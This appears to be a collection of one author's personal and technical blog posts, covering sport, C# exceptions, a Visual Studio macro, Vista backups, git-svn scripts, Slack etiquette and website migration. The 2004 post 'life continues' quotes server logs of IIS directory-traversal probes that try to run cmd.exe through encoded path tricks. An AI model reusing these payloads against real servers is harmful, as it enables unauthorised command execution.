<p>swimming? nope, haven't been for ages, will do soon. played badminton the other week though.</p>
<p>Don't forget to come and meet Sophie if you haven't already.<nobr> </nobr>:D</p>
<p>cheers tom 'n kev for keepin up the flow.</p>
<p>x</p>
<file_sep>---
layout: page
title: Subscribe
permalink: /subscribe/
---
<!-- subscribe box and content is in footer -->
Subscribe by email below for full mailing list.
Blog posts are also available as an <a href="/feed.xml">RSS/Atom feed</a> if you prefer to use a feed reader (though some things I only post to the mailing list).
<file_sep>---
title: "life continues"
date: 2004-09-10
slashdot_url: https://slashdot.org/journal/83324/life-continues
---
<p>Worked many hours this week, trying to get new work web site finished.</p>
<p>So this evening I cycled to the pool and did an hours training. I'm now tired and chlorinated, but very relaxed.<br>---<br>My web server went off on one at 2am the other night (just when I was thinking of going to sleep), thrashing its hdd. Think someone was trying to hack into it with a buffer overflow. Here's the log:</p>
<blockquote>
<div><p> <tt>192.168.3.11 - - [09/Sep/2004:02:22:01 +0100] "POST http://192.168.3.11:25/ HTTP/1.1" 200 480 "-" "-"</tt></p></div> </blockquote>
<p>Sods.</p>
<p>Looking at my logs, the server was subject to a few attempts within hours of it coming online.<br>Much more than my hosted site. Guess it's people running <a href="http://www.insecure.org/">nmap</a> against adsl dial up ip ranges and getting all excited by the prospect of an open port 80.</p>
<p>Here's a classic example:</p>
<blockquote>
<div><p> <tt>192.168.127.12 - - [05/Sep/2004:17:37:46 +0100] "GET<nobr> </nobr>/.hash=eb649e3d22cdb034d91b64d4c11215f83a7e2fda HTTP/1.1" 404 372 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:26 +0100] "GET<nobr> </nobr>/scripts/root.exe?/c+dir HTTP/1.0" 404 342 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/MSADC/root.exe?/c+dir HTTP/1.0" 404 340 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:28 +0100] "GET<nobr> </nobr>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 397 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"<br>172.16.58.3 - - [06/Sep/2004:18:08:29 +0100] "GET<nobr> </nobr>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"<br>192.168.127.12 - - [07/Sep/2004:12:59:20 +0100] "GET<nobr> </nobr>/.hash=cf770b6f55e15660d70f00542bd58efeb7a8487f HTTP/1.1" 404 372 "-" "-"</tt></p></div> </blockquote>
<p>--<br>By the way, if you think nmap is very uncool to know about, may I direct you to the news article on nmap's site which shows Trinity actually doing a real hacking attack in the film Matrix Reloaded<br><a href="http://www.insecure.org/">http://www.insecure.org/</a></p>
<file_sep>---
title: "sleep is for wusses"
date: 2004-05-02
slashdot_url: https://slashdot.org/journal/70152/sleep-is-for-wusses
---
<p>My debut performance draws near! I have my picture in the twyford advertiser and the henley standard which is cool. I stood outside Waitrose for an hour publicising the play and got slightly nervous as to the number of people who actually sounded interested. So I made an extra effort in the technical rehearsal and only got some of it completely wrong. Oh well, guess it's called amateur dramatics for a reason!</p>
<p>As for the swimming, I'm pleased with the improvement in my technique, soon I may even be able to swim the required distances in one go. I've also been doing a bit of running. The new shoes still aren't quite right - they rub a bit, and it's going to be a long time before I can run ten kilometers. Maybe I'll wait till next year before attempting to race, I wouldn't want all the marshals to have to wait for me before the can go home!</p>
<p>And now, a word about coz.<br>The other day I was sitting with my friends in her old house, and it was quiet, so I said "everyone point at coz", and everyone pointed at the floor, and laughed. Then we discussed whether coz would have gone coy even when so far away<nobr> </nobr>:D</p>
<p>Now I'm going to have another go at re-encoding DV video into XviD. Then it's time for some sleep.</p>
<file_sep>---
title: "warble"
date: 2003-11-14
slashdot_url: https://slashdot.org/journal/52210/warble
---
<p>yada yada</p>
<p>nothing doing today.</p>
<p>Hello James, if you see this hope the weather's nice in whichever part of the world you're in today!</p>
<p>Suppose I might as well post that my domain is timwise.co.uk, and that it currently contains a cub web site! (Which I'm v proud of. - tho you can't see most of the interesting bits because that's the admin pages.)</p>
<p>Just wondering whether to upload the code to freshmeat or summat, and if I should start using GPL 'n things.</p>
<p>Ooh, and I bought some to way radios<nobr> </nobr>:)<br>Binatone 0503, 30 quid the pair from B&Q<br>(Yes I did reallly need them)</p>
<p>And a cordless drill (oops!)</p>
<file_sep>---
title: "SBR"
date: 2004-06-23
slashdot_url: https://slashdot.org/journal/75235/sbr
---
<p>SBR = Swim, Bike, Run. It's a triathlon thing.</p>
<p>On monday, I biked to work as per, very unstrenuous. Then I went training in the evening. Went for a proper training run, which I was just jogging back from when the heaveans opened and I got soaked. The water then turned to slush, like being sprayed with a slush puppy.</p>
<p>Then I swam, very very slowwwly (urgh, gurgle).</p>
<p>Spent tuesday moaning about how much my legs hurt and how tired I was. It's good to be a brit.</p>
<p>Today I woke up with a start thinking I'd slept through my alarm. But it was half an hour too early. Must've got enough sleep for once.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
layout: post
title: throw vs throw ex vs wrap and throw in c-sharp
date: '2014-05-10T10:23:00.000Z'
author: <NAME>
tags:
modified_time: '2014-05-10T10:37:34.821Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2291640492202610062
blogger_orig_url: https://timwise.blogspot.com/2014/05/throw-vs-throw-ex-vs-wrap-and-throw-in.html
---
I've come across the `throw` vs `throw ex` 'debate' a few times, even as an
interview question, and it's always bugged me because it's never something I've
worried about in my own c# code.
# Background
So here's a typical example of the throw vs throw ex thing:
[https://stackoverflow.com/questions/730250/is-there-a-difference-between-throw-and-throw-ex](https://stackoverflow.com/questions/730250/is-there-a-difference-between-throw-and-throw-ex)
Basically it revolves around either messing up the line numbers in your stack
trace (`throw ex;`) or losing a chunk of your stack entirely (`throw;`) -
exception1 and 2 respectively in this nice clear answer:
[http://stackoverflow.com/a/776756/10245](http://stackoverflow.com/a/776756/10245)
<div class="flickr-pic">
<a data-flickr-embed="true"
href="https://www.flickr.com/photos/tim_abell/13910043519/"><img
src="https://live.staticflickr.com/7193/13910043519_348f641fe1_k.jpg"
alt="Smiley face in a coffee stain"></a>
</div>
# The third option
I've just figured out why it's never been an issue for me.
Because in my own code, whenever I catch and re-throw I _always_ wrap another
exception to add more context before rethrowing, and this means you don't have
either of the above problems. For example:
```
private static void ThrowException3() {
try {
DivByZero(); // line 43
} catch (Exception ex) {
throw new Exception("doh", ex); // line 45
}
}
```
Exception 3:
```
System.Exception: doh ---> System.DivideByZeroException: Division by zero
at puke.DivByZero () [0x00002] in /home/tim/repo/puker/puke.cs:51
at puke.ThrowException3 () [0x00000] in /home/tim/repo/puker/puke.cs:43
--- End of inner exception stack trace ---
at puke.ThrowException3 () [0x0000b] in /home/tim/repo/puker/puke.cs:45
at puke.Main (System.String[] args) [0x00040] in /home/tim/repo/puker/puke.cs:18
```
Obviously 'doh' would be something meaningful about the state of that function
`ThrowException3()` in the real world.
Full example with output at
[https://gist.github.com/timabell/78610f588961bd0a0b95](https://gist.github.com/timabell/78610f588961bd0a0b95)
This makes life much easier when tracking down bugs / state problems later on.
Particularly if you `string.Format()` the new message and add some useful state
info.
<file_sep>---
title: "xmas flash animation"
date: 2004-11-15
slashdot_url: https://slashdot.org/journal/90420/xmas-flash-animation
---
<p>just call me dave. [grin]<br><a href="http://homepage.ntlworld.com/david.davies527/sheep/sheepanims/cardxmas2003.htm">http://homepage.ntlworld.com/david.davies527/sheep/sheepanims/cardxmas2003.htm</a><br>i like it. go look at his other stuff.</p>
<p>Today I went to work, which was novel, having been laid up after the tooth extraction thingy. I was starting to forget what I went for. It's definitely more interesting than being at home watching the spiders decorate my house in preparation for christmas. Not that I was, but the comparison is still valid.</p>
<file_sep>---
title: Why I want you to use slack threads
layout: post
---
Someone has probably sent you a link to this blog post in response to you posting multiple messages in a slack channel on the same topic.
Don't worry, we're not angry with you, we just want to help. We also know that the slack interface can be a bit confusing, especially on mobile, and it's easy to accidentally respond in channel instead on a thread.
This post is not intended to shame or berate you, just to share information on how we can all make slack a nicer and less distracting thing to use for everyone.

The above screenshot is an example of two consecutive messages in slack, this happens if you send the message in two parts. (Send one message, think of something extra, send another message.)
This post is here to explain to you with kindness why posting multiple messages like this might be causing issues for other people and offer some alternate approaches.
## Why multiple messages are a problem for others
It seems harmless to just post another couple of messages, right?
Slack in any active organisation can quickly become a firehose of information that can be quite hard to keep up with. It takes some effort from all involved to protect everyone's focus and flow time. As an aside if you want an insight into just how damaging distractions can be I recommend diving into Cal Newport's writings <https://www.calnewport.com/books/>, particularly "Deep Work". Some of us have the luxury of turning off slack for most of the day, but some people need to keep up more actively than that.
### Notifications and unread messages
Slack allows you to carefully manage what notifications you receive, but for a channel it basically comes down to notifications on or off for channel messages.
If you have a channel that you want (or need) to keep up to date with in a timely manner then when someone sends a new channel message you will have intrusive notifications and as shown below an "unread channel" in bold-and-white sat glaring at you waiting to be read:

If you use the convenient "All unread" feature then that will also sit glaring at you as below with an eye-catching "1 new message" button until you go and look:

The problem with multiple related channel messages in this case is that if someone gets your first message, decides that it's not a conversation relevant to them and then goes back to trying to concentrate your second message will set off all their notifications once again and send them back to having unread messages to worry about.
If you had instead used the below alternatives of editing or threads then there would be no new notifications and no new unread messages when you edit your message or add to the thread.
### Deciding what conversations to follow
As someone who is trying to avoid slack-overwhelm the ability to follow and unfollow threads is a very useful feature. Slack will automatically give new notifications for threads where you have been mentioned with an `@` or have added a message of your own to the thread.
To follow/unfollow a thread, hover over the top message in the thread, click the dots, and click "turn off notifications for replied" as shown below:

If people are not correctly using threads to group themes of discussion then this feature becomes mostly useless.
As an aside this applies just as much to failure to start a new thread when the discussion changes topic as it does to failing to use threads in the first place.
### Catching up with a channel
Sometimes you will join a channel and then mute it (right-click, mute) because you want to be able to keep up to date on your own schedule, say daily or weekly.

When people in the channel have conversations in the form of channel messages you can easily end up having to read 1000 messages to just know what's been going on for a day and catch up on anything important.

If instead the people in the channel are disciplined in using threads then it can easily be down to 20 messages with some very long threads that you can dive into if you feel the need.
## What you can do instead
By using the following methods you can help everyone else in your slack channel make better use of their time, more easily follow relevant conversations, and have fewer distracting FOMO moments (Fear Of Missing Out).
### Start a thread
Start a thread on your own message and add more messages in there:

This allows you to add further context etc for those interested without writing a massive message in one go directly in the channel or creating a string of independent channel messages.

See also <https://slack.com/intl/en-gb/help/articles/115000769927-Use-threads-to-organise-discussions->
### Edit your existing message
Did you just forget to mention something? You can edit the message you've already posted to make corrections or add more information.
Hover over the message and then press the "more actions" dots:


See also <https://slack.com/intl/en-gb/help/articles/202395258-Edit-or-delete-messages>
### Delete your subsequent messages
If you've already posted more than one channel message and then realise your mistake, you can delete the extra messages before converting to a thread or edit, leaving the channel nice and tidy for anyone who shows up later to read.

This is particularly important to avoid ending up with multiple threads on different channel messages (on the same topic) as other people reply to different bits of your message resulting in confusion and a disjointed conversation.

See also <https://slack.com/intl/en-gb/help/articles/202395258-Edit-or-delete-messages>
## Offering gentle reminders with an emoji
If your team knows to do this but forgets sometimes then add `:start_a_thread:` as an emoji (under "customize workspace) to easily remind people when they forget.

(Thread gif image source: <https://slackmojis.com/>)

## Summary
So in summary, please give a thought to others before you send a second message. It may be quick for you but if there are 50 people in the slack room then you are costing them much more time and attention than it saves you by not taking the time to construct a clean message or thread.
<file_sep>---
title: "Music - bad response"
date: 2003-12-28
slashdot_url: https://slashdot.org/journal/56467/music---bad-response
---
<p>There's a reason fruityloops shouldn't have a free demo... and it sounds like <a href="http://www.t.abell.dsl.pipex.com/music/unlit-ted1.mp3">this</a> (consider this copylefted).</p>
<file_sep>---
layout: post
title: backing up Vista
date: '2009-12-18T10:08:00.002Z'
author: <NAME>
tags:
modified_time: '2009-12-18T11:57:06.028Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7478677393110232279
blogger_orig_url: https://timwise.blogspot.com/2009/12/backing-up-vista.html
---
So here's a tale of annoying things.
I generally try and avoid running anything proprietary at home, and especially anything from Microsoft. But for reasons beyond my control a copy of Vista has embedded itself in our household.
For my linux backups I've settled on [dar](http://dar.linux.free.fr/) (Disk ARchiver) + [dargui](http://dargui.sourceforge.net/) as it applies the keep it simple rule (certainly in comparison with a lot of other tools I tried, such as the ubuntu default "home user backup" tool, which has a simple ui but offers limited control and I'm not sure how easily I could recover files from it in a disaster). Dar is like tar (Tape ARchiver) but more designed with backup to disk in mind, which is what I was after in order to backup to [usb hdd](http://www.ebuyer.com/product/178934), and most importantly does incremental/differential backups the way I want.
So then I came to back up this Vista home directory (sorry, Users directory / profiles). I have disliked the old fashioned microsoft backup files (.bkf) from Windows XP and before ever since I tried to get files out of one from a Linux box. Turns out it's not exactly the best supported format. I didn't have much luck with [mtftar](http://freshmeat.net/projects/mtftar/). It seems Microsoft have produced a replacement ([plus ça change](http://en.wiktionary.org/wiki/plus_%C3%A7a_change,_plus_c%27est_la_m%C3%AAme_chose)) to the old windows backup that is evidently designed to be [simple](http://dictionary.reference.com/browse/simple "lacking mental acuteness or sense"), which has very strange ideas about how you might want to back up your pc. It seems keener to back up the sample image files from the office install than than the user's photos. I very quickly fell out with this tool and moved on.
Some people might recommend windows home server, but I am not about to _pay_ for more shoddy Microsoft software in order to solve problems created by other shoddy Microsoft software. Vote with your wallet, as they say.
So next on the list, remote backup from a linux box. [backup pc](http://backuppc.sourceforge.net/) looked great, and has many nifty features, however having got it all set up I got permissions errors in the My Documents etc folders, which are the important ones. I tried different user permissions for the backup user, and different group memberships, though stopped short of resetting all user directory permissions so as to not break anything but couldn't get past these errors. More details on that attempt in my [backuppc and windows vista](http://timwise.blogspot.com/2009/10/backuppc-and-windows-vista.html) blog entry. There is a hint in the [Robocopy wikipedia](http://en.wikipedia.org/wiki/Robocopy) that there is some special mode needed to be able to get past these permissions issues.
> "The so-called Backup mode is an administrative privilege that allows Robocopy to override permissions settings (specifically, NTFS ACLs) for the purpose of making backups."
But I didn't get any further than that.
So finally I come to the conclusion that Vista just doesn't want you to do backups without paying microsoft more money, and that they have forgotten or never knew the [KISS](http://en.wikipedia.org/wiki/KISS_principle) mantra that makes *nix such a pleasure to work with. (Rather opting for their usual "making simple things easy and difficult things impossible".)
It was [Linux Format 127 Ubuntu 9.10 Cover Disc](http://www.linuxformat.co.uk/archives?issue=127) that came to the rescue. Popped the disc in,rebooted, connected my usb hdd (formatted with ext3 of course), ran `apt-get install dar`, opened the disk icon on the desktop representing the evil vista installation partition on the local disk (to get it mounted), opened the usb hdd disk icon (also to get it mounted), then ran `dar -c /media/usbhdd/backups/vistargh -z` from the directory /media/vista/Users/. This ran fine and I was able to read the file from a better operating system with no issues.
<file_sep>---
layout: post
title: format all documents in a visual studio solution
date: '2009-01-29T11:49:00.011Z'
author: <NAME>
tags:
- macro
- vb
- visual studio
modified_time: '2009-06-25T11:59:34.737Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8623933611307349730
blogger_orig_url: https://timwise.blogspot.com/2009/01/format-all-document-in-visual-studio.html
---
Here's a handy macro script for visual studio I knocked together today. It
runs "edit, format document" on every document of the listed file types.
You have to keep an eye on it as it's interactive and does sometimes pop up a
message and wait for an answer.
You can get the vb file at
[http://github.com/timabell/vs-formatter-macro](http://github.com/timabell/vs-formatter-macro)
More info at
[http://wiki.github.com/timabell/vs-formatter-macro](http://wiki.github.com/timabell/vs-formatter-macro)
Below is the original code. Note that this is older than the version available
on github above.
```
Imports System
Imports EnvDTE
Imports EnvDTE80
Imports EnvDTE90
Imports System.Collections.Generic
Imports System.Diagnostics
Imports System.Text
Public Module Formatting
Dim allowed As List(Of String) = New List(Of String)
Dim processed As Integer = 0
Dim ignored As Integer = 0
Dim errors As StringBuilder = New StringBuilder()
Dim skippedExtensions As List(Of String) = New List(Of String)
Public Sub FormatProject()
allowed.Add(".master")
allowed.Add(".aspx")
allowed.Add(".ascx")
allowed.Add(".asmx")
allowed.Add(".cs")
allowed.Add(".vb")
allowed.Add(".config")
allowed.Add(".css")
allowed.Add(".htm")
allowed.Add(".html")
allowed.Add(".js")
Try
recurseSolution(AddressOf processItem)
Catch ex As Exception
Debug.Print("error in main loop: " + ex.ToString())
End Try
Debug.Print("processed items: " + processed.ToString())
Debug.Print("ignored items: " + ignored.ToString())
Debug.Print("ignored extensions: " + String.Join(" ", skippedExtensions.ToArray()))
Debug.Print(errors.ToString())
End Sub
Private Sub processItem(ByVal Item As ProjectItem)
If Not Item.Name.Contains(".") Then
'Debug.Print("no file extension. ignoring.")
ignored += 1
Return
End If
Dim ext As String
ext = Item.Name.Substring(Item.Name.LastIndexOf(".")) 'get file extension
If allowed.Contains(ext) Then
formatItem(Item)
processed += 1
Else
'Debug.Print("ignoring file with extension: " + ext)
If Not skippedExtensions.Contains(ext) Then
skippedExtensions.Add(ext)
End If
ignored += 1
End If
End Sub
Private Sub formatItem(ByVal Item As ProjectItem)
Debug.Print("processing file " + Item.Name)
Try
Dim window As EnvDTE.Window
window = Item.Open()
window.Activate()
DTE.ExecuteCommand("Edit.FormatDocument", "")
window.Document.Save()
window.Close()
Catch ex As Exception
Debug.Print("error processing file." + ex.ToString())
errors.Append("error processing file " + Item.Name + " " + ex.ToString())
End Try
End Sub
Private Delegate Sub task(ByVal Item As ProjectItem)
Private Sub recurseSolution(ByVal taskRoutine As task)
For Each Proj As Project In DTE.Solution.Projects
Debug.Print("project " + Proj.Name)
For Each Item As ProjectItem In Proj.ProjectItems
recurseItems(Item, 0, taskRoutine)
Next
Next
End Sub
Private Sub recurseItems(ByVal Item As ProjectItem, ByVal depth As Integer, ByVal taskRoutine As task)
Dim indent As String = New String("-", depth)
Debug.Print(indent + " " + Item.Name)
If Not Item.ProjectItems Is Nothing Then
For Each Child As ProjectItem In Item.ProjectItems
taskRoutine(Child)
recurseItems(Child, depth + 1, taskRoutine)
Next
End If
End Sub
End Module
```
<file_sep>---
title: "waaaah!"
date: 2005-05-31
slashdot_url: https://slashdot.org/journal/108203/waaaah
---
<p>firefox 1.0.4 broke my favourite extension, the bookmark synchronizer.<nobr> </nobr>:(</p>
<file_sep>---
layout: post
title: Poll svn server for changes with git clone
date: '2012-04-05T15:45:00.006Z'
author: <NAME>
tags:
- bash
- git
- svn
modified_time: '2012-04-10T18:49:19.544Z'
thumbnail: http://3.bp.blogspot.com/-gjo7YaLzSpI/T32-eIibreI/AAAAAAAAAEg/NE4QizgAB5U/s72-c/poll-svn_catch.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5257654522615465429
blogger_orig_url: https://timwise.blogspot.com/2012/04/poll-svn-server-for-changes-with-git.html
---
Just for convenience, paste this in a git bash window:
while true; do date; echo "Polling svn server..."; git svn fetch;echo "Sleeping."; sleep 300; done

Then just refresh your favourite git log viewer.
Get the gist: [poll-svn.sh gist](https://gist.github.com/2353631)
That's all folks!
<file_sep>---
layout: post
title: error "Not a valid object name" filtering an ex-svn git repo with renames
date: '2008-09-10T14:18:00.007Z'
author: <NAME>
tags:
- dev
- git
- troubleshooting
- svn
modified_time: '2008-09-11T09:27:31.215Z'
thumbnail: http://farm4.static.flickr.com/3085/2800643267_aa1dd46299_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2621355116425651592
blogger_orig_url: https://timwise.blogspot.com/2008/09/error-not-valid-object-name-filtering.html
---
Under git version 1.5.4.3, which as of writing is the current in ubuntu 8.04
hardy heron, trying to split out a folder from a git repo where the repo was an
import from subversion (svn), and the folder was renamed in the past causes a
failure as show below:
```
#!/bin/bash -v
rm -rf test-case
mkdir test-case
cd test-case/
svnadmin create svnrepo
export repo="`pwd`/svnrepo"
mkdir -p import/a
echo '1' >> import/a/file.txt
svn import -m 'initial import' import file://$repo/trunk/
svn co file://$repo/trunk/ checkout
echo '2' >> checkout/a/file.txt
svn ci -m "file modified" checkout
svn mv -m "moving file" file://$repo/trunk/a file://$repo/trunk/b
svn up checkout
echo '3' >> checkout/b/file.txt
svn ci -m "modified again" checkout
svn log -v checkout
mkdir -p gitcopy/a
git svn clone file://$repo/trunk/ gitcopy/a
cd gitcopy/a
git filter-branch --subdirectory-filter a # <= FAILS
cd ../../
mkdir gitcopy/b
git svn clone file://$repo/trunk/ gitcopy/b
cd gitcopy/b
git filter-branch --subdirectory-filter b
```
The marked line above fails with the following error:
[1] Rewrite bcfe73ef303832b6112a2419dc1da5f782672c14 (3/3)fatal:
Not a valid object name bcfe73ef303832b6112a2419dc1da5f782672c14:a
This has been fixed in the latest build of git: `version 1.6.0.1.294.gda06a`
and no longer fails.
The "fatal: Not a git repository" error message that filter branch produces
doesn't seem to matter.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/2800643267"><img
src="https://live.staticflickr.com/3085/2800643267_aa1dd46299.jpg" alt="Photo of a break dancer in barcelona"></a>
</div>
<file_sep>---
layout: post
title: starfighter
date: '2007-05-27T13:44:00.000Z'
author: <NAME>
tags:
- starfighter
- linux
- games
- fun
- oss
modified_time: '2007-05-27T14:03:29.172Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3601923976003048564
blogger_orig_url: https://timwise.blogspot.com/2007/05/starfighter.html
---
<http://starfighter.nongnu.org/>

Whilst looking for backup packages on ubuntu via synaptic by searching for the word "tar", I stumbled across the package "starfighter". So I installed it. Then ran it. And played it. It's rather good fun. Ctrl to fire lasers, space to fire rockets, cursors to get around. Spend your time chasing enemy ships around the screen, and collecting bonuses / money. Has a decent sound track too.
Highly recommended. I love the open source world.
```
$ apt-cache show starfighter
Package: starfighter
Priority: optional
Section: universe/games
Installed-Size: 368
Maintainer: Debian Games Team <<EMAIL>>
Architecture: i386
Version: 1.1-6
Depends: libc6 (>= 2.4-1), libgcc1 (>= 1:4.1.0), libsdl-image1.2 (>= 1.2.3), lib
sdl-mixer1.2 (>= 1.2.6), libsdl1.2debian (>> 1.2.7+1.2.8), libstdc++6 (>= 4.1.0)
, starfighter-data (= 1.1-6)
Filename: pool/universe/s/starfighter/starfighter_1.1-6_i386.deb
Size: 116320
MD5sum: 959f894e78517a3411c3c2656d61b85c
SHA1: ac7e2f458d4bd8c57056e11bb3da8609f35b528c
SHA256: 29c9adee1ee2fb52f1d790254683579e919655ad01bb806a02a59d32abcb8d58
Description: 2D scrolling shooter game
After decades of war one company, who had gained powerful supplying both
sides with weaponary, steps forwards and crushes both warring factions
in one swift movement. Using far superior weaponary and AI craft, the
company was completely unstoppable and now no one can stand in their
way. Thousands began to perish under the iron fist of the company. The
people cried out for a saviour, for someone to light this dark hour...
and someone did.
.
Features of the game:
.
o 26 missions over 4 star systems
o Primary and Secondary Weapons (including a laser cannon and a charge weapon)
o A weapon powerup system
o Wingmates
o Missions with Primary and Secondary Objectives
o A Variety of Missions (Protect, Destroy, etc)
o 13 different music tracks
o Boss battles
.
Homepage: <http://www.parallelrealities.co.uk/starfighter.php>
Bugs: mailto:<EMAIL>
Origin: Ubuntu
```
<file_sep>---
title: "laughing my behind off!"
date: 2005-05-13
slashdot_url: https://slashdot.org/journal/106757/laughing-my-behind-off
---
<p>Here's <a href="http://slashdot.org/comments.pl?sid=147501&cid=12359432">a reminder</a> to log off.</p>
<file_sep>---
title: Zero-downtime website rewrite migrations
layout: post
reddit: https://www.reddit.com/user/timabell/comments/13or19w/zerodowntime_website_rewrite_migrations/
---
As we know, big-bang rewrites are incredibly dangerous. They are likely to fail or be rejected. For example, the new thing never reaches "feature parity" and gets rejected in favour of the system you were trying to replace.
But how do you practically avoid it? If it's one website on one domain then that seems irreducible. Right?
But there is a way.
## A change looms
You need to change the technology for your website for some reason.
Perhaps your [tech debt](/2020/07/09/approaches-to-refactoring-and-technical-debt/) is out of control and you basically need to do a complete rewrite from scratch, perhaps you've decided to switch technology.
Perhaps you have decided to move everything in your company to a different tech stack.
Either way you are making a BIG change to your technology. Out with the old, in with the new.
### A C# to Rails migration at DfE
I was lucky enough to be involved in a technology shift at the Department for Education (UK) with some exceptionally talented people. I'd been part of a team creating an MVP (Minimal Viable Product) in C# with a couple of web front ends and a postgres database (yay no sql server!). The department then decided to shift wholesale to Ruby on Rails (for good reasons, but they are not important here).
The approach taken was superb, went really well, and is well worth learning from, I'll outline it here for the benefit of all. It was inspired by a [previous rewrite at gov.uk](https://insidegovuk.blog.gov.uk/2016/07/29/the-specialist-publisher-rebuild-behind-the-scenes/) as we were lucky enough to have fabulous people on the team who'd been involved in that.
## How to seamlessly migrate
What's unsurprising here is that you spin up a new web service in your new technology, or with your new way of doing things.
There are two simple key elements that allow a seamless piece-by-piece migration:
1. HTTP redirects in both directions
2. Shared state
These two allow you to build a new service, one tiny piece of functionality at a time, and immediately put them into production, retiring the legacy version of that feature immediately.
## Bi-directional HTTP redirects
It goes as follow:
1. Chose one feature to build in the new technology
2. Spin up the new service on a similar subdomain (e.g. "`www2.example.org`" next to the legacy "`www.example.org`")
3. In the new service, redirect all routes that are not yet implemented to the legacy domain
4. In the legacy service redirect the single route for the chosen feature to the new service.
Now users will seamlessly transition in and out of the new service as they click around the site.
This is genius and I wish I could say I thought of it myself!
Repeat until all desired features are on the new service and the legacy service can be turned off.
## Shared state
It's obviously important that if a user does something on the new system that it is immediately reflected in the state on the legacy system. For us this meant shared access to the postgresql database. The exact method probably isn't that important so long as you can get it to be seamless.
Whatever your state store is, it's important to "freeze" schema changes while you do the transition (within reason) so that you avoid the overhead of updating both system's understanding of the storage schema.
## No more legacy
This will go smoother if you observe the cardinal rule of rewrites: no new functionality can be added to the legacy system. Any changes and fixes must be postponed or made on the new service.
This is to avoid the trap where the old system keeps being improved and the new system can never catch up. It also prevents your time and resources being invested in something that you plan to delete.
> "While it’s tempting to add new features to Specialist Publisher right now, we need to concentrate on rewriting and integrating with the Publishing Platform. ... We don’t want to run two versions of Specialist Publisher concurrently for very long as it risks creating confusion, so we’ll deprioritise product requests until the rebuild is complete."
>
> ~ [<NAME>, Inside GOV.UK, 2016](https://insidegovuk.blog.gov.uk/2016/07/29/the-specialist-publisher-rebuild-behind-the-scenes/#:~:text=while%20it%E2%80%99s%20tempting%20to%20add%20new%20features%20to%20specialist%20publisher%20right%20now%2C%20we%20need%20to%20concentrate%20on%20rewriting%20and%20integrating%20with%20the%20publishing%20platform.%20)
The only exception to this is whatever changes are needed to support the seamless user experience across the two services. Notably the redirections.
## Monitoring
As you migrate your tech, keep an eye on your telemetry, error reporting and anything else you have to make sure your user experience remains good throughout.
## Pattern name: Strangler Fig
This approach is known as the "strangler fig" pattern.
> "An alternative route is to gradually create a new system around the edges of the old, letting it grow slowly over several years until the old system is strangled. Doing this sounds hard, but increasingly I think it's one of those things that isn't tried enough"
>
> ~ <NAME>
> <https://martinfowler.com/bliki/StranglerFigApplication.html>
See also
- <https://learn.microsoft.com/en-us/azure/architecture/microservices/design/patterns>
- <https://www.freecodecamp.org/news/what-is-the-strangler-pattern-in-software-development/>
## The end
There's not much more to say on this. It's a simple concept that packs a huge punch. If you're thinking of modernising a web stack, or changing tech, I would 100% recommend this approach. The risks of failure are so much lower.
Many thanks to those who I worked with showed the way.
<file_sep>---
title: Enabling modern app security
layout: post
---
A broad-view of improving security in any organisation.
## An inspirational panel discussion
Yesterday I went to a panel discussion hosted by [eSynergy](https://esynergy.co.uk/), ["Innovation at its safest: Excellence in Software Engineering through Integrated Security Best Practices"](https://esynergy.co.uk/event/security-excellence-in-engineering/)

